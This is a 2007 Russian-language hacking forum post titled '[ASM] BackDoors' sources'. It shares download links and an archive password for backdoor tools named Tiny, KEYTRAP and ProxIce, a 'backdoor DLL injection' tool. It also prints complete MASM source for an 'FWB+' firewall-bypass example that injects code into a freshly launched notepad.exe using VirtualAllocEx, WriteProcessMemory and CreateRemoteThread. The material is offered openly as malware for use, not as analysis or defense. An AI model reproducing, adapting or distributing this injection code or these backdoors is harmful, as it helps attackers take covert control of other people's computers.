[ASM] BackDoors' sources

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by banned, 23 Sep 2007.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,194
    Reputations:
    252
    Tiny v3.2

    Download Tiny
    Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]

    [masm] fwb+ example

    Code:
    Function injection (FWB+) example by shapeless
    
    - http://swerat.com
    - http://chasenet.org
    
    thanks to ksv for the Inject-code :)

^

.386

.model flat, stdcall
option casemap: none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc

includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib

FuncSize MACRO L1, L2
        mov eax,L2
        sub eax,L1
    ENDM

TInjData struc
    GetAddr        dword ?
    LoadLib        dword ?
    szUser32     byte 16 dup(0)
    szMsgBox     byte 32 dup(0)
TInjData ends

.data
szApp                 db "notepad.exe",0
szUsr32             db "user32.dll",0
szKrnl32             db "kernel32.dll",0
szMsgbox             db "MessageBoxA",0
szLoadLib         db "LoadLibraryA",0
szGetProcAddr db "GetProcAddress",0

.data?
SInfo                STARTUPINFO <>
PInfo                PROCESS_INFORMATION <>
InjData            TInjData <>
pFunc                dword ?
dwThreadID    dword ?
hKernel            dword ?

.code

; Thanks to ksv for c++ example of this code :)
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword
LOCAL dwWritten:dword

    invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
    .if eax==0
        ret
    .endif
    mov esi,eax

    invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_READWRITE,addr dwOldProtect
    .if eax==0
        ret
    .endif
    
    invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
    .if eax==0
        ret
    .endif
    
    mov eax,esi
    
    ret

Inject endp


Label1:

remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0

    mov esi,iData
    assume esi:ptr TInjData

    lea ecx,[esi].szUser32
    push ecx
    call [esi].LoadLib
    
    lea ecx,[esi].szMsgBox
    push ecx
    push eax
    call [esi].GetAddr
    
    push 0
    push 0
    push 0
    push 0
    call eax
    
    assume esi:nothing
    
    ret
remotefunc endp

Label2:

__ep:
; create new process
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo

; prep the structure
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox

invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax

invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax

invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax


; inject function
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax

; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF

invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0,addr dwThreadID

EOF:

invoke ExitProcess,0
end __ep

    KEYTRAP

    Download Keytrap
    Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]


    ProxIce 2.0 - backdoor DLL injection


    Download ProxIce
    Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
     
    #1 banned, 23 Sep 2007
(You must log in or sign up to post here.)